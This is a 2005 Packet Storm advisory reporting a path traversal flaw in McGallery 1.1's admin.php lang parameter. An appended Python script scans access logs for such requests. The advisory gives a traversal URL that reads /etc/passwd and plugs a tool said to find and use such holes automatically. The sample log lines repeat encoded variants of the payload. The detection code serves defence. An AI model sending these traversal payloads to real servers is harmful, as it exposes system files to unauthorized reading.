phpforum11.txt

2005-06-21T00:00:00
ID PACKETSTORM:38178
Type packetstorm
Reporter d_bug
Modified 2005-06-21T00:00:00

Description

                                        
`Vendor: Phpforum, http://www.phpforums.net/  
Product: McGallery v 1.1  
  
Vulnerability: reading of files on disk  
Consequences: Web server paths are opened   
Risk: High  
  
Description: An attacker can craft a query in the URL and gain access to system files  
Example: http://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd  
  
Discovered by D_BuG d_bug@bk.ru  
NemesisSecurityTeam  
http://nemesisoftware.com/  
  
CheckZond free v. 1.0 http://nemesisoftware.com/products.htm  
uses the vulnerabilities above for automatic vulnerability search (Google Hacking technique) and usage.  
  
--   
Best regards,  
D_BuG mailto:d_bug@bk.ru  
  
`
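
A log check for the request pattern in the advisory, added here as an example and not part of the original advisory or of McGallery: it flags requests to `admin.php` whose `lang` value, after repeated percent-decoding, is not a plain token. The log lines are constructed, and both the log format and the allowed shape of a legitimate `lang` value are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Jun/2005:10:00:01 +0000] "GET /mcgallery/admin.php?lang=english HTTP/1.1" 200 5120',
    '198.51.100.9 - - [21/Jun/2005:10:00:05 +0000] "GET /mcgallery/admin.php?lang=../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.9 - - [21/Jun/2005:10:00:09 +0000] "GET /mcgallery/admin.php?lang=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843',
    '198.51.100.9 - - [21/Jun/2005:10:00:12 +0000] "GET /mcgallery/admin.php?lang=%252e%252e%252fconfig HTTP/1.1" 404 312',
    '198.51.100.4 - - [21/Jun/2005:10:00:20 +0000] "GET /mcgallery/index.php?album=3 HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: a legitimate lang value is a short name such as "english".
SAFE_LANG = re.compile(r'[A-Za-z0-9_-]{1,32}')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_lang_requests(lines):
    """Return (line_no, status, decoded_lang) for admin.php requests
    whose lang parameter is not a plain token."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target, status = m.group(1), int(m.group(2))
        parts = urlsplit(target)
        if not parts.path.endswith('/admin.php'):
            continue
        # parse_qs decodes once; fully_decode handles further encoding layers.
        for raw in parse_qs(parts.query, keep_blank_values=True).get('lang', []):
            lang = fully_decode(raw)
            if not SAFE_LANG.fullmatch(lang):
                hits.append((no, status, lang))
    return hits


if __name__ == '__main__':
    for no, status, lang in suspicious_lang_requests(SAMPLE_LOG):
        print(f'line {no}: status {status}, lang={lang!r}')
```

A 200 status on a flagged line is the case to triage first, since it indicates the server returned content for the request.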